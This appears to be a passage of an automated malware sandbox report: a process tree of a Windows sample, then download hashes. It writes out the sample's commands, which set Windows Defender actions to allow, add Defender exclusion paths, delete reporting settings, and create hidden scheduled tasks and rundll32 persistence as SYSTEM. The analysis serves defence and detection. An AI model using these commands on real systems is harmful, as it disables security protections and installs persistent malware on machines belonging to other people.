C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4760
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4568
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3508
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3168
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3176
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3548
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3828
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4620
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3216
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:548
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3424
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4208
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5112
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1212
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1160
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1684
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1404
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4508
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3100
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:988
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\InaIvrjBgGxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\InaIvrjBgGxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bNrcflyMMmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bNrcflyMMmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pGMaoMOmU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pGMaoMOmU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zjyBtxSiMuSUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zjyBtxSiMuSUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOKUZcIdbhBstHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOKUZcIdbhBstHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jWXQtFKEfMKfhKUF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jWXQtFKEfMKfhKUF\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:323⤵PID:4644
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:324⤵PID:4740
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:643⤵PID:4952
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:323⤵PID:4280
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:643⤵PID:2264
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:323⤵PID:4384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:643⤵PID:2332
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:323⤵PID:1284
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:643⤵PID:1676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:323⤵PID:3988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:643⤵PID:3596
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOKUZcIdbhBstHVB /t REG_DWORD /d 0 /reg:323⤵PID:2824
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOKUZcIdbhBstHVB /t REG_DWORD /d 0 /reg:643⤵PID:1188
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF /t REG_DWORD /d 0 /reg:323⤵PID:4440
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF /t REG_DWORD /d 0 /reg:643⤵PID:1492
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jWXQtFKEfMKfhKUF /t REG_DWORD /d 0 /reg:323⤵PID:3080
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jWXQtFKEfMKfhKUF /t REG_DWORD /d 0 /reg:643⤵PID:1836
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gToLbSxfR" /SC once /ST 05:08:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4660 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gToLbSxfR"2⤵PID:4268
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gToLbSxfR"2⤵PID:2180
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aClwDgKsxBQnbYjuF" /SC once /ST 02:01:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UuEaWBB.exe\" dn /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1432 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aClwDgKsxBQnbYjuF"2⤵PID:4508
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4700
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3828
-
C:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UuEaWBB.exeC:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UuEaWBB.exe dn /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvffOywEAsomCrOclN"2⤵PID:2000
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2348
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1552
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:5104
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3036
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pGMaoMOmU\gqYIPc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yKRLlrVxZRCwfvY" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2264 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yKRLlrVxZRCwfvY2" /F /xml "C:\Program Files (x86)\pGMaoMOmU\PNLEqsS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yKRLlrVxZRCwfvY"2⤵PID:1944
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yKRLlrVxZRCwfvY"2⤵PID:3956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xMldJvduBHIruY" /F /xml "C:\Program Files (x86)\InaIvrjBgGxU2\eyuRBEh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3088 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AoZZmzTUnslpJ2" /F /xml "C:\ProgramData\uOKUZcIdbhBstHVB\BVPCvev.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4824 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WzbfXanLtYYyBKpOR2" /F /xml "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\xSwKdTD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1744 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LdHJZpmEfCRWAMVLKFS2" /F /xml "C:\Program Files (x86)\zjyBtxSiMuSUC\IGhrHkk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2112 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GqChQHaYBumcgGPDT" /SC once /ST 01:15:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jWXQtFKEfMKfhKUF\WiMWxCzJ\ShjzraF.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4688 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GqChQHaYBumcgGPDT"2⤵PID:2652
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3164
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4752
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3504
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4408
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aClwDgKsxBQnbYjuF"2⤵PID:4372
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jWXQtFKEfMKfhKUF\WiMWxCzJ\ShjzraF.dll",#1 /site_id 5254031⤵PID:3076
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jWXQtFKEfMKfhKUF\WiMWxCzJ\ShjzraF.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:4692 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GqChQHaYBumcgGPDT"3⤵PID:2636
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD595d2816ffeb92607c0f405cfd8b2e6e9
SHA1c31a270411d5c33d41158a90aae7fb4082170d7a
SHA256bf41005bdc2b696500e1c6fb7129e5bef35dac2781282ba01a7cc6454fa5c91b
SHA5124cd1d6fe8cc9e8e79c32ab16e1fc6ae4cc278b46fa0629cc21c2e8dd57589d5b9c6e50023d8e644dafeff2f10686e5e89b2e25345397f154de7f43f5753c9c84
-
Filesize
2KB
MD525ff596e693710af8e7612a6a6635b45
SHA1b9fb6c6c9f50c28a4584c3ed84d70320b545308c
SHA25668d35771b32a517b18c68235c035d327afafd23a389cf69aff23e65572e57180
SHA512a8c7b079db0e0bd19d7372f5382e14860213c9691c9144992f82863f0106cb0ee17f8bb17b1973a2ecffa61fa1ee372b3b69328a8fd43f292895e59c3ffdecdf
-
Filesize
2KB
MD5862a1810bc4f7218ed8a26c522d1b71c
SHA1a3c19194bb1b40e190b3e1e9d2a7b842ff3c8c0b
SHA256828502747afa51a4cd8c8c3c4ab215e7eef303376c792941b06aa78526e57c44
SHA5123d2de5965c63d2db04f8970acbc77edd49d0c1940568e4b1fbd5893d8fd9cd4ccb95c707f0d6285686d4fb8919853e7a0de3f40da54a05bb9dda75b958f81281
-
Filesize
2KB
MD51d95b0160dce1ef68067176dd74af5ee
SHA1981eca90a326f32bdac13af39247d68c6fd25cdf
SHA256ead2a25fe164d66ffe9553a2ba50e4cebc45ad7bc91c83051ec83148afd4c639
SHA51259f1329999ee348b925ac56e19abec6c25645f73f7643ffe9ce209ca9ac737e77fb91305b726face5a96efa6c4bca5cc601c7ac1b31ee1a9adbe24e2b9bb2197
-
Filesize
2KB
MD5cfd64cb7f207e978b49c3fb62de8d44b
SHA1131611711bcf907a064f843b20f1f785494d8d8e
SHA2560712f38e0c621f572511da7d93c42cfdc2c2945a0d6c24096280e54453ccce7c
SHA51261d00e5bb54d0272cd8ae0aee6ae46298a9796a07701ebd1c7a0b03b56c8310b798596bee5b7ada25ab32eb462a339340a83e3dd6324eb56c1bae2fc4a8cf9ea
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.3MB
MD505c36c1285f91afcfa0b49341acfd4b1
SHA1a50b777584540c57f938da1fcc5f10845ef3de23
SHA256242181a19834f9fb0ef96b1ccd8c0070d1759d64e84dfddcc2b65b12babce679
SHA512c6585fa702987f7ac02191cecba70055b94075978e199521fd8b7495351b3a014d79be2b0331f9c9b4aa65567779f15b879ee0270b78c08ca8aa7089425ea9ae
-
Filesize
6.3MB
MD505c36c1285f91afcfa0b49341acfd4b1
SHA1a50b777584540c57f938da1fcc5f10845ef3de23
SHA256242181a19834f9fb0ef96b1ccd8c0070d1759d64e84dfddcc2b65b12babce679
